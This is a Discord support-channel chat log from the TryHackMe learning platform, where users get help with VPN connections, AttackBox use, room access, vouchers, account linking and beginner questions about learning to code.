There are instructions there, you need to SSH in.
That machine doesn't run a webserver.

ah

well i am dumb

thanks

Gave +1 Rep to @eager fulcrum

Got it working?

yep

No, you just don't have the experience yet

i should read before i panic

again thanks for the help

You'll get more comfortable with all this with experience

👍

Hello, I paid for acces to the Wreath Network but I can not connect to it?

How did you pay for access?

Using a credit card

It's free or included with the subscription, you can't pay for Wreath itself.

Sorry I said wreath I meant Throwback

Ok, what can't you access at the moment?

And how are you attempting to access it?

Well I made the payment, then the website redirected me to the same intro page and I do not see the room in my available rooms or access

!docs verify

If you follow those steps, you can post images.
I'm currently not quite sure what you mean

ok my profile is verified

I made the payment then I get redirected to the same page

try https://tryhackme.com/jr/throwback

Should join you to the room

It doesn't work

Ok, you'll want to email support then most likely

Ok is there a specific section on the website?

!email

oh nice 🙂 thank you

Lol I actually needed to go to my email redeem the actual voucher

My bad

Oh you bought a voucher rather than doing it directly?

IDK how those work for throwback

Well no I bought it directly but then it just generated a voucher that you need to enter on the same page as the payment page

Oh, weird, ok

i'm not getting any points from rooms...

Some rooms give points, some don't

that would explain a lot, thx

Thanks, but I tried it like 5 times, and from two different devices, doesn't work

Gave +1 Rep to @livid vapor

Is there a way for me to be able to copy/paste from outside the AttackBox to inside of it, and vice versa?

Yes. Use the menu on the left hand side

There's a button that will pull out a tray thing

oh okay, didn't look there. Thank you!

Hey all, for some reason I'm not able to make any contact with any of the target boxes I'm deploying on the site. Under the Access page indicates green check for both 'Server Status' and 'Connected'. I'm currently using the image of Kali from OffSec's website on vmwareplayer. Let me know if more details are needed! Thanks in advance

Ignore the access page

Do I need to grab a new config for Open VPN every time I close my box?

Nope.

You can check your connection using http://10.10.10.10
It runs a webserver, and responds to pings

So I don't get any response from this address but I do from stuff like google/youtube/etc

So you're not connected to the THM VPN

The THM VPN doesn't touch your internet connection

hmm well that's good to know gonna have to figure out how to fix that

Connect to the VPN from the command line

I ended up grabbing a new config out of superstition but this was all it was, thanks!

Gave +1 Rep to @eager fulcrum

Can I DM a mod regarding discord token? Low priority, but appreciate help.

You should be able to ask here?

I need to have my discord token removed. I created a new THM account and would prefer to link that new account to my Discord.

Can you log in from that account and ask for your token to be removed please?

Sorry if I made that confusing. I'd like to assign my new THM account's discord token to my current Discord account I'm using right here. The Bot won't verify since I have an existing associated token.

Or do I need to literally delete my original THM account?

Yeah. Please log in under that discord account and ask for your token to be removed there.

hey guys

anyone using kali via wsl2 ?

https://sol.gfxile.net/dontask.html

ninja just stay it straight

no need to show me your link

Just ask your question directly.

and yea i know to 'just ask'

But you didn't.

is kali-linux-default enough to have every tools that i might need ?

the metapackage

No

You install stuff as you need it

It's a good base.

ok i'm installing it ty

In future, questions that aren't directly THM related (like this one), should go in #infosec-general

ok i'm gonna go there as i have another question

#bot-commands

Added time to the box I was working. It showed it added the hr but then with 1:05 mins left I got a popup that it was about to expire. It did expire and booted me out. I logged back in and now my 25 day streak is gone. Is that something a mod can help with or do I email THM admins? thx

You'll need to email support

Mods aren't site staff

!email

thx

:)

hey

@livid vapor so at first it goes like this

i wait a few seconds and this happen

I'm not seeing the error in that, other than tls handshake failed

!vpnscript

see if that helps at all

it says did not find the config

download that file to the same directory as your vpn file

now it says i am not connected to the internet although

i just downloaded it

did you download it from within the kali vm?

yeah

the script just does a ping to 1.1.1.1 to check that.

i pinged 1.1.1.1 and there is no problem

did you run the script using sudo?

yeah

I'm not sure offhand

my vbox settings for kali network is nat

and it says i have a wired connection

is that has to do with anything ?

no, my vm is also NAT, but wifi.

maybe

that is the proplem

and you can access the 'net in the kali vm?

i do not get a wifi

nah, wired connections work just as well

connection

only wired

but i use a laptop and there is a wifi card in it

maybe try regenerating the vpn config, wait 2-3 minutes, then download it and try again?

i did

does not work either

why does openvpn think that i do not have internet connection

i don't know :/

and why it works on windows but not vbox

do a ps aux | grep openvpn in kali

hi guys

hello

can i ask something

yes

about X-Frame and Vulnerable JS library

that would be better for #infosec-general . This channel is just for technical support type issues

okayy

tyty

Where is it? I don't see that channel

it gave the help

commands

Not sure what you mean by help commands. Screenshot please.

the -help

Scroll up a bit, or just click the channel name

the final line says

general standalone options

Screenshot please. I don't know what's happening on your system

Also, just as a heads up, I'll only be here a few more minutes

wrong command

ps aux | grep openvpn

note the grep 🙂

sorry

okay, that's good

hm

and you're only running a single vpn, right? Nothing on the host?

yes

i never used vpn before try hack me it makes my internet weaker

not weaker, but slower, maybe.

yeah slower

I'm not sure what else to try at the moment

ok man no problem

thanks for your time

you're welcome. Sorry I couldn't help you

it is ok i took a lot of your time too

i will try the kali vbox

I thought you already were using a kali vbox?

no i mean the pre installed

image

what are you using currently?

iso

installed?

yes

that's what mine is, and what lots of people use

so I doubt that is the problem

unless you did something really strange to the config of it

i know i am just desperate

I hear ya

i will try anything

another short term option is to use the attackbox

i do use it but it closes

i have a free

account

yeah, I think non-subscribers are limited to 1hr a day

not sure

Not really a tech support question but with the license the TryHackMe bot is under, if i copy code from a fork of it how am i supposed to provide credit?

I'm trying to complete Linux privesc room, but connecting to the box through ssh is extremely slow. While working on it, the ssh session with freeze and not accept any input and I have to force close the terminal window. I have tried changing ovpn servers.

Edit: turns out it might not be freezing on my end, but it running very slow. The cursor stops blinking, but If I let it sit, I see my input eventually catches up (after a long time)

Hi THM Staff & Team.
I'm trying to create a room and upload a VM to contribute to this great platform, but I'm having difficulty with the conversion process (it keeps failing despite meeting all the pre-reqs). Am I able to get a bit of support with this? 🙂

so

hm

i want to start in cyber

and

i don't realy know

how to code

you can learn cyber security from tryhackme website and to code there are a lot of crash course on youtube that teaches programming languages

ok

what language

do you think is the best

in my opinion, go for python, thats what i started with, the basics are not that complicated, and its good for beginners

ok

thx

i have one more question

in the first step

the task was to put the ip shown in the attack box

in the url bar (new one)

i've done it

but nothing happened

which ip did you use?

10.10.xx.xx

this type

are you using your own machine or the attack box from the site?

yes dude

just started it

like

10 mins ago

so you got an ip when you clicked start machine?

yes

first thing it said was

open the browser in the attack box and put it in the search bar and visit it

also which room are you doing?

tutorial?

open the browser in the attack box and paste the ip

and you should get a web page

so

i make an new chrome tab

and just type the ip

yes

in the attack box

and

what is the url

for the attack box

do you see a linux system in your browser right now?

so

let's go in private

to talk

if you verify you can send pics

ok

start them both

ohhh

i can't find the blue button

its there as i showed in the pic above

BUT IT DOESN'T SHOW

just

refresh the page and check

hacktivities